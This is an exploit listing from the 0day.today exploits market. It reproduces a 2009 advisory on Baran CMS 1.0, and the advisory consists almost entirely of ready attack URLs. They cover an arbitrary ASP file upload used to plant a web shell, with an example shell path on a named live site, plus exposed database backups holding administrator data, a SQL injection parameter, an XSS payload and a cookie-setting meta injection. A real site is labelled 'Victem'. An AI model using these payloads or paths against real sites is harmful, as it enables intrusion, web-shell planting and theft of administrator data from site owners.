[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Baran CMS 1.0 Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulns

Author
Aria-Security Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4847
Category
web applications
Date add
12-02-2009
Platform
unsorted
===========================================================
Baran CMS 1.0 Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulns
===========================================================


#########################################################################################
[0x01] Informations :
Name    : Baran Cms
Version : 1.0 (Personal)
site       : http://www.baran-cms.ir
$$         : 50$
Vul        : (Arbitrary ASP File Upload/DB/SQL/XSS/CM)
Credit    : Aria-Security Team
#########################################################################################
[0x02] Arbitrary ASP File Upload :
http://site.ir/upadmini/DEMO.asp
Up to System
shell uploaded in : http://site.ir/upadmini/Uploads/[Name.asp]
example             : http://www.zenyan.ir/upadmini/Uploads/sh3ller.asp
------------------------------------------------------------
[0x03] Database backups :
The Latest generated Database's backups
http://site.ir/[Sitename]dbdb/[1.zip,2.zip,3.zip,n+1.zip !?!]
admin.mdb + db.mdb
admin.mdb :  Administrator Information
db.mdb       :  data file
------------------------------------------------------------
[0x04] SQL :
http://site.ir/main/default.asp?CatId=[SQL]
------------------------------------------------------------
[0x05] XSS :
http://site.ir/main/default.asp?CatId=<ScrIpT>("Pouya_Server")</ScrIpT>
------------------------------------------------------------
[0x06] CM :
http://site.ir/main/default.asp?CatId=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
------------------------------------------------------------
Victem : http://www.zenyan.ir
########################################################################################



#  0day.today [2024-12-25]  #